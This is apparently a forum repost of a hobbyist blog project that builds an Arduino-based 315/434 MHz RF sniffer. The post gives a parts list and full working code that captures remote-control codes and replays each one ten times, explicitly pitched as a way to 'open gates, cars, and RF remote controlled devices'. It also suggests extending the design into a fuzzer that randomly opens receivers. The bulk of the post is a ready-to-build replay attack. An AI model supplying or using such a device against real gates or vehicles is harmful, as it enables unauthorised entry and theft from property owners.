RF Sniffer – open gates, cars, and RF remote controlled devices with ease.

[Nytro]

RF Sniffer – open gates, cars, and RF remote controlled devices with ease.

The more I get to play with hardware, the more I get to see how security is lacking or implemented poorly (and I’m being very polite here). This time, I would like to share my 315mhz/434mhz RF Sniffer project, which can be used to open poorly protected gates, cars, etc. Nothing new under the sun, only my own take on building such a device.

TIP – The size of the antenna is VERY important. Don’t neglect it – use the right length and use a

wave calculator

for future reference.

The story

I wanted to see how easy it is to open a keyless car using an Arduino. And then I wanted to simultaneously control multiple appliances operating on different frequencies (315Mhz/434Mhz).

Using the following design, you can easily make a fuzzer to randomly open/close/control all kind of RF receivers out-there. You have been warned.

Current version of the sniffer will resend whatever it sniffs 10 times. Behavior is easily changeable.

I am using the RCSwitch library to reduce heavy thinking on my part. Mission accomplished.

Shopping List

[TABLE]

[TR]

[TH]Amount[/TH]

[TH]Part Type[/TH]

[TH]Properties[/TH]

[/TR]

[TR]

[TD]2[/TD]

[TD]Inductor[/TD]

[TD=class: props]wire antenna[/TD]

[/TR]

[TR]

[TD]1[/TD]

[TD]Red LED – 5mm[/TD]

[TD=class: props]package 5 mm [THT]; leg yes; color Red (633nm)[/TD]

[/TR]

[TR]

[TD]1[/TD]

[TD]Arduino Uno (Rev3)[/TD]

[TD=class: props]type Arduino UNO (Rev3)[/TD]

[/TR]

[TR]

[TD]1[/TD]

[TD]315Mhz RF-LINK_RX[/TD]

[TD=class: props]package rf-link_rx; part # WRL-10533[/TD]

[/TR]

[TR]

[TD]1[/TD]

[TD]434Mhz RF-LINK_RX[/TD]

[TD=class: props]package rf-link_rx; part # WRL-10532[/TD]

[/TR]

[TR]

[TD]1[/TD]

[TD]315Mhz RF-LINK_TX[/TD]

[TD=class: props]package rf-link_tx; part # WRL-10535[/TD]

[/TR]

[TR]

[TD]1[/TD]

[TD]434Mhz RF-LINK_TX[/TD]

[TD=class: props]package rf-link_tx; part # WRL-10534[/TD]

[/TR]

[/TABLE]

Scheme

We connect both receivers/transmitters like the following:

Code

And here is the Arduino code. Use at your own risk.

/*

* RF Sniffer © Elia Yehuda 2014

*

* This program was coded.

*

* No warranty whatsoever.

* Using this program will cause something, most likely problems.

*

*/

#include <RCSwitch.h>

// number of times to resend sniffed value. use 0 to disable.

#define RESEND_SNIFFED_VALUES 10

// ye, thats the led pin #

#define LED_PIN 13

// class for 315 receiver & transmitter

RCSwitch rf315Switch = RCSwitch();

// class for 434 receiver & transmitter

RCSwitch rf434Switch = RCSwitch();

void setup()

{

// print fast to console

Serial.begin(115200);

// 315 receiver on interrupt #0 (pin #2)

rf315Switch.enableReceive(0);

// 315 transmitter on pin #4

rf315Switch.enableTransmit(4);

// how many resends

rf315Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);

// 434 receiver on interrupt #1 (pin #3)

rf434Switch.enableReceive(1);

// 434 transmitter on pin #5

rf434Switch.enableTransmit(5);

// how many resends

rf434Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);

Serial.println("[+] Listening");

}

// simple decimal-to-binary-ascii procedure

char *tobin32(unsigned long x)

{

static char b[33];

b[32] = '\0';

for ( int z = 0; z < 32; z++) {

b[31 - z] = ((x >> z) & 0x1) ? '1' : '0';

}

return b;

}

void process_rf_value(RCSwitch rfswitch, int rf)

{

char str[120];

unsigned long value;

// flash a light to show transmission

digitalWrite(LED_PIN, true);

value = rfswitch.getReceivedValue();

if (value) {

sprintf(str, "[+] %d Received: %s / %010lu / %02d bit / Protocol = %d",

rf, tobin32(value), value, rfswitch.getReceivedBitlength(), rfswitch.getReceivedProtocol() );

} else {

sprintf(str, "[-] %d Received: Unknown encoding (0)", rf);

}

Serial.println(str);

// resend the sniffed value (RESEND_SNIFFED_VALUES times)

rfswitch.send(value, rfswitch.getReceivedBitlength());

// reset the switch to allow more data to come

rfswitch.resetAvailable();

// stop light to show end of transmission

digitalWrite(LED_PIN, false);

}

void loop()

{

if (rf315Switch.available()) {

process_rf_value(rf315Switch, 315);

}

if (rf434Switch.available()) {

process_rf_value(rf434Switch, 434);

}

}

Sursa: RF Sniffer – open gates, cars, and RF remote controlled devices with ease. | Ziggy's of the world